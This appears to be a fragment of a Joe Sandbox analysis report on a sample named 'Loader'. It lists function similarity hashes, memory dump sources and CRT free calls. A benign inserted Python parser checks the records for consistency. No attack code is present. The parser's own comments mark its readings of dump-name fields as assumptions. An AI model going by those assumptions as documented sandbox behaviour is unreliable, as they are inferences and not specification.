                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 601c823af3766805e417a1433b07791c2ef4d09ed18531b5a6009259365d3198
                                                                                                                                                                                                                                                                  • Instruction ID: 49b5c6f8ae45b736860f520b0d144f2a1718a0c474b8c1e5cdc8cbaf4a800f98
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601c823af3766805e417a1433b07791c2ef4d09ed18531b5a6009259365d3198
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECC11236A442858FDF08CEBCD5A17DEBBF2AB87314F249419D811E7784D63E890ACB51
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 20689943b8a8d55e3fe1ba85e46c0bd0f85b84b4ad45a398bcd78e8655f7f14b
                                                                                                                                                                                                                                                                  • Instruction ID: 1edfe39566b5b9d7b87f3987ac7239c3e9bffa1550485a7e7d7c2666176066fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20689943b8a8d55e3fe1ba85e46c0bd0f85b84b4ad45a398bcd78e8655f7f14b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCB15A36B416258FCB088D7CC4D93EE3BF6AB43364F306619C525DB795C62A950AC780
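The records above are the per-function metadata Joe Sandbox attaches to each disassembled block: the memory dump the code was lifted from, the module base it belongs to (Offset 6CE10000 for every record here), and the Opcode / Instruction IDs and fuzzy hashes used for code similarity. As an added example, not Joe Sandbox's own code, the following Python parses such records into structured data and runs the consistency checks a practitioner would want before reusing the IDs against another report. Two things in it are assumptions inferred from the values on this page rather than documented behaviour: that the fifth dotted field of a dump file name is the Windows PAGE_* protection of the region (0x20 on the code dump, 0x02 and 0x04 on the associated ones), and that a record marked "based on PE: true" comes with a dump starting at the module base. The embedded SAMPLE is a condensed excerpt of the listing in the same layout, including the orphan hash line at the top of this section and a record cut off after its Opcode Fuzzy Hash.

```python
"""Parse the 'Memory Dump Source' function records of a Joe Sandbox listing (the blocks above)
and sanity-check them before their IDs are reused as indicators. Added example for this page,
not Joe Sandbox code; ASSUMPTION marks inferences from the listing's values, not documentation."""
import re
from dataclasses import dataclass, field

# Condensed excerpt of the listing in its own layout: the orphan hash line of a preceding
# record, one complete record, and a record cut off after its Opcode Fuzzy Hash.
SAMPLE = """\
• Instruction Fuzzy Hash: E7D10572B541158FDF04CE7CC9913DE7BF6AB4B324F246119D818FB790C22AA94ACB64
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
• Opcode ID: 60bd6dec62f728ae93ea5f83e63c164f8e8e124c457ac145dc25b1d43297679b
• Instruction ID: 75e343b582b50b7fe6bb5b48de0b9628ef809c3c18b4a0d307345bc064e2335f
• Opcode Fuzzy Hash: 60bd6dec62f728ae93ea5f83e63c164f8e8e124c457ac145dc25b1d43297679b
• Instruction Fuzzy Hash: 77D11572A485118FCB04CEBCD8D17DEBBF6BB4B354F206019E416EB790C239A84ACB55
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Opcode ID: 5a4daf485a3e96709a67cd7cc9a8fa6338392dbaf6b5ea6ee21e1e22d3a95276
• Instruction ID: b9d62c4e347bc8e9bbfe5acb3123060d9dbec4bcce61879faa3877047b59cd71
• Opcode Fuzzy Hash: 5a4daf485a3e96709a67cd7cc9a8fa6338392dbaf6b5ea6ee21e1e22d3a95276
"""

PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",  # winnt.h
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

@dataclass
class DumpFile:
    name: str
    base: int        # 4th dotted field: region base (equals the Offset / snapshot base in the listing)
    protection: int  # 5th dotted field; ASSUMPTION: PAGE_* value (0x20 on the code dump, 0x02/0x04 elsewhere)

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:x}")

def parse_dump_name(name: str) -> DumpFile:
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected dump file name: {name}")
    return DumpFile(name, int(parts[3], 16), int(parts[4], 16))

@dataclass
class FunctionRecord:
    source: DumpFile
    offset: int  # module base the function belongs to
    based_on_pe: bool
    associated: list = field(default_factory=list)
    snapshot: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*?)\s*$")
SOURCE = re.compile(r"^(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$")
TEXT_FIELDS = {"Snapshot File": "snapshot", "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
               "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}

def parse_records(text: str) -> list:
    """One FunctionRecord per 'Memory Dump Source' block; fields with no open record are dropped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = None  # the block's Source File line creates the new record
            continue
        m = FIELD.match(line)
        if not m:
            continue  # unbulleted headers such as 'Joe Sandbox IDA Plugin'
        key, value = m.group(1).strip(), m.group(2)
        if key == "Source File":
            if not (s := SOURCE.match(value)):
                raise ValueError(f"unparsable Source File line: {value}")
            current = FunctionRecord(parse_dump_name(s.group(1)), int(s.group(2), 16), s.group(3) == "true")
            records.append(current)
        elif current is None:
            continue  # tail of a record that began before this excerpt (first line of SAMPLE)
        elif key == "Associated":
            current.associated.append(parse_dump_name(value))
        elif key in TEXT_FIELDS:
            setattr(current, TEXT_FIELDS[key], value)
    return records

def check_record(rec: FunctionRecord) -> list:
    """Consistency checks worth running before a record's IDs are reused as indicators."""
    problems = []
    if not rec.instruction_fuzzy:
        problems.append("truncated record: no Instruction Fuzzy Hash")
    if rec.opcode_id.lower() != rec.opcode_fuzzy.lower():  # identical in every record of this listing
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if not rec.source.protection & 0xF0:  # ASSUMPTION: disassembled code comes from an executable page
        problems.append(f"source dump is {rec.source.protection_name}, not executable")
    if rec.based_on_pe and rec.offset not in {d.base for d in [rec.source, *rec.associated]}:
        problems.append("based on PE, but no dump starts at the module base")  # ASSUMPTION: header dump expected
    return problems
```

Run over the full section, every record resolves to the same source dump (base 6CE11000, executable) and module base 6CE10000, so the Opcode IDs can be collected per module and intersected with the IDs from another report to find shared functions; the truncated last record of this section is the one the checks flag.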
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a4daf485a3e96709a67cd7cc9a8fa6338392dbaf6b5ea6ee21e1e22d3a95276
• Instruction ID: b9d62c4e347bc8e9bbfe5acb3123060d9dbec4bcce61879faa3877047b59cd71
• Opcode Fuzzy Hash: 5a4daf485a3e96709a67cd7cc9a8fa6338392dbaf6b5ea6ee21e1e22d3a95276
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CB1287AB156528FCF048EBCD4843DE77F6AB47358F30A119D429D7B84C12ADA0ACB54
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfc0c17e333355a6a5186aab7ac79548467eded7f29d822060e112515aec3ac8
• Instruction ID: 9993d303b253dfea4db27b85981905d0780b827d41d174f156fb079c92700d6f
• Opcode Fuzzy Hash: bfc0c17e333355a6a5186aab7ac79548467eded7f29d822060e112515aec3ac8
• Instruction Fuzzy Hash: 1E913A36A855268FDF048D7CC5A93DF3BFABB43375F31A9198914DB784C22A550ACB80
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3146a18c8cced50d80da3b4e56fc4bea95e681bf6dadaa15e2099cf3dd3bf90
• Instruction ID: 8750a8523eba1926fe71393717dbf3c42bbbd2b46cf429a8c186ce2a791e940b
• Opcode Fuzzy Hash: e3146a18c8cced50d80da3b4e56fc4bea95e681bf6dadaa15e2099cf3dd3bf90
• Instruction Fuzzy Hash: AE91F632B445218FDF0889ECD4E53EE37F2AB87365F30661DC525EBB91D12AA506C790
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f80a707859c7d6e390460a0bbe51c621880d0288195823bf26207194a4b2540
• Instruction ID: 1dfd5115a3a57f31ea9892b9b86b080eeb168a0764439a49e33dba02355b72e6
• Opcode Fuzzy Hash: 4f80a707859c7d6e390460a0bbe51c621880d0288195823bf26207194a4b2540
• Instruction Fuzzy Hash: AA91D432F44A058FDB04CEBCE5953DE77F1AB4B318F209515E824D7B94D23A9A0A8F45
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0f56b24a7c08e60a980429090830a6be11d58a4986007fb02cba255dd65c147b
• Instruction ID: 991140d76186e9ab2520b02b333daca6b377525817e8f1e4cca7ac11a14f36ca
• Opcode Fuzzy Hash: 0f56b24a7c08e60a980429090830a6be11d58a4986007fb02cba255dd65c147b
• Instruction Fuzzy Hash: EAA1CF72A142058FCF08CEBCE9817DD7BF2AB4B314F208515E412E7B44C739994ACB99
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c72efb2b49dfec506384db0581128c7ab3f185da6337d97eaab0b60c46108ae6
• Instruction ID: cfeb39a5b2e7b380e0456450c40771ba4175ff3efd66814d0117ed4169daeb5a
• Opcode Fuzzy Hash: c72efb2b49dfec506384db0581128c7ab3f185da6337d97eaab0b60c46108ae6
• Instruction Fuzzy Hash: 0E91DB72A44654CFCF04CFBCD5906DEBBFABB4A314F206119E819EB740D639A90ACB51
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd498a7676157e49f813885a55b95bd9be79aa00eaa84fa4e487a7c9d7358c3e
• Instruction ID: 76aa9c1e6847b1660d17fc245288065d1d5bfbc7d73e20fdf06717fc508790d3
• Opcode Fuzzy Hash: cd498a7676157e49f813885a55b95bd9be79aa00eaa84fa4e487a7c9d7358c3e
• Instruction Fuzzy Hash: 09812C72A441264FCB04DE7CD5953EE37FABB43364F306515C429EF791C12AAA0ACB45
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 17d4ef7c0662f18d379540f53df87a69fed7bf83ee49bbca92b0caa62aa689fe
                                                                                                                                                                                                                                                                  • Instruction ID: b9f1f5a1305f9c45d6df3188e43b1656532d7d2d58ca0c3e2bae64e27c2938b9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17d4ef7c0662f18d379540f53df87a69fed7bf83ee49bbca92b0caa62aa689fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9712232A411068FCF048AFCE5953EE37F6AB43359F35C515C825D7B54C62ACE1A8B41
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 097fa27a27ae1b6985132bfbecb74a86b8edbc89283bf9932fa478e13a942d81
                                                                                                                                                                                                                                                                  • Instruction ID: b042e069fb18b90012dcf641e992b3b5184367059efec12a70d778135dcf4378
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097fa27a27ae1b6985132bfbecb74a86b8edbc89283bf9932fa478e13a942d81
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5961F632A459268FCF04CEBCC4D13EE7BF6EB47324F246119D86997791C229AD06CB90
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: af9f9a965c9620c2d5a8a168e7c6f4cf8a5f301163c51e171c9bc07238edb37d
                                                                                                                                                                                                                                                                  • Instruction ID: 7435f1cc7c99192808a8bc5f5d9c0b02246f1038bc7c1d6a4deaa1451f2f2730
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af9f9a965c9620c2d5a8a168e7c6f4cf8a5f301163c51e171c9bc07238edb37d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B371E566288FCF04CEACD494BDE7BF1BB4A318F21611AD819AB790C335A805CF91
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                                                  • Instruction ID: db46282483943067404ddaad5fd73f6d2b669c9930719bc2d3b94bafe506f4de
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5E08C32916238EBCB14CB88D949A8AF3FCEB44B04B61409AB611E3640C272DE10CBE0

Control-flow Graph
(Graph for the function at 6ce55680; rendered as an image in the original report, with executed and not-executed blocks distinguished by colour. The raw edge list is not reproduced here.)
APIs
• ___free_lconv_mon.LIBCMT ref: 6CE556C4
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575D4
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575E6
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575F8
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5760A
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5761C
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5762E
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57640
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57652
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57664
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57676
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57688
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5769A
  • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE576AC
• _free.LIBCMT ref: 6CE556B9
  • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
  • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
• _free.LIBCMT ref: 6CE556DB
• _free.LIBCMT ref: 6CE556F0
• _free.LIBCMT ref: 6CE556FB
• _free.LIBCMT ref: 6CE5571D
• _free.LIBCMT ref: 6CE55730
• _free.LIBCMT ref: 6CE5573E
• _free.LIBCMT ref: 6CE55749
• _free.LIBCMT ref: 6CE55781
• _free.LIBCMT ref: 6CE55788
• _free.LIBCMT ref: 6CE557A5
• _free.LIBCMT ref: 6CE557BD
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                                  • Opcode ID: f5eb8a1e91efe57e3a14063ba8a1aa2514c353046591a1eef8994435a07eb87b
                                                                                                                                                                                                                                                                  • Instruction ID: 4a94c8cbfedd25cd36105518cf7aa5fcbc19d05c97b852a78fdd7d243c696078
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5eb8a1e91efe57e3a14063ba8a1aa2514c353046591a1eef8994435a07eb87b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B311C31606300DFEB119B75E845B9677F8EF0031CFB04429E4A9D6BA0DB73F9648A20

Control-flow Graph (rendered graph for function 6ce52ae3 not reproduced; executed/not-executed colouring lost in extraction)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6be838dc40d6542c5857ea3731eb9a5b16e1f78a7389944370bcc4fd028bc68b
• Instruction ID: 3dd14d50af2015d737f0f0c39381e9e3bfc0d9a9d7b05346a2f3aa9095a12845
• Opcode Fuzzy Hash: 6be838dc40d6542c5857ea3731eb9a5b16e1f78a7389944370bcc4fd028bc68b
• Instruction Fuzzy Hash: F921AB76900108AFCB41DF94D845DDD7BB9FF18748F5041A9F515EBA20DB32EA68CB90

Control-flow Graph (rendered graph for function 6ce545a8 not reproduced; executed/not-executed colouring lost in extraction)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-$y$l
• API String ID: 0-1475279248
• Opcode ID: 97134f5e0490a4ccb46e213e6258f68f1d5d0813d3d91574f44e659df6b08ab8
• Instruction ID: 6081a7de29921c8d9f745dc9a3ca178a97e742334213929f3604bf76fa4f44c1
• Opcode Fuzzy Hash: 97134f5e0490a4ccb46e213e6258f68f1d5d0813d3d91574f44e659df6b08ab8
• Instruction Fuzzy Hash: A921E731A46225ABDB158A658C84B9E37789F0376CFF10612E925A7BC0D7B2DD34C6E0

Control-flow Graph (rendered graph for function 6ce50d80 not reproduced; executed/not-executed colouring lost in extraction)
